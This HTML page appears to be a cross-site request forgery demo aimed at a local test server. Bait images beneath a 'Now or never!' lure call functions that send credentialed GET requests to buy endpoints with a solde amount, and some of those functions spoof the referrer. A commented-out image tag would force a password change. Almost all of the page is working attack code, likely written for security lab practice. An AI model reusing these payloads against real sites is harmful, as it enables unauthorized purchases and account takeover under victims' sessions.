<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    <style>
        p{
            margin-top: 30px;
            text-align: center;
            font-weight: bold;
            font-size: 40px;
        }
        div.container{
            margin: 100px auto;
            width: 1200px;
            /*background-color: blue;*/
            display: flex;
            align-items: center;
            justify-content: space-around;
        }

    </style>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>
    <script src="https://cdn.jsdelivr.net/npm/js-cookie@rc/dist/js.cookie.min.js"></script>
    <script type="text/javascript">
        //src="http://127.0.0.1:3000/buy?solde=8000"
        function attack() {
            //let c = Cookies.get('login')
            //Cookies.remove('login')
            //Cookies.set("login2", "aaa", { domain:"localhost", secure: true, sameSite:"none" });
            //console.log(c);
            $.ajax({
                xhrFields: {
                    withCredentials: true
                },
                url: 'http://localhost:3000/buy?solde=4000',
                type: 'GET',
                //crossDomain: true,
                //dataType: "json",
                //headers: {"Cookie" : "login=aaa"},

                success: function(response) {
                    console.log("success");
                },
                error: function() {
                    console.log("failed!");
                }
            })
        }
        function attack2() {
            //let c = Cookies.get('login')
            //Cookies.remove('login')
            //Cookies.set("login2", "aaa", { domain:"localhost", secure: true, sameSite:"none" });
            //console.log(c);
            document.referrer = 'http://localhost:3000/'
            $.ajax({
                xhrFields: {
                    withCredentials: true
                },
                url: 'http://localhost:3000/buy2?solde=4000',
                type: 'GET',
                //crossDomain: true,
                //dataType: "json",
                //headers: {"Cookie" : "login=aaa"},

                success: function(response) {
                    console.log("success");
                },
                error: function() {
                    console.log("failed!");
                }
            })
        }
        function attack3() {
            //let c = Cookies.get('login')
            //Cookies.remove('login')
            //Cookies.set("login2", "aaa", { domain:"localhost", secure: true, sameSite:"none" });
            //console.log(c);
            document.referrer = 'http://localhost:3000/'
            $.ajax({
                xhrFields: {
                    withCredentials: true
                },
                url: 'http://localhost:3000/buy3?solde=4000',
                type: 'GET',
                //crossDomain: true,
                //dataType: "json",
                //headers: {"Cookie" : "login=aaa"},

                success: function(response) {
                    console.log("success");
                },
                error: function() {
                    console.log("failed!");
                }
            })
        }
    </script>
</head>
<body>
<!--    <img src="http://127.0.0.1:3000/changepasswd?npasswd=www&cnpasswd=www" alt="">-->
    <p>What are you waiting for? Now or never!</p>
    <div class="container">
        <img src="/public/img/1.jpg" onclick="attack()"/>
        <img src="/public/img/2.jpg" onclick="attack2()"/>
        <img src="/public/img/3.png" onclick="attack3()"/>
    </div>

</body>


</html>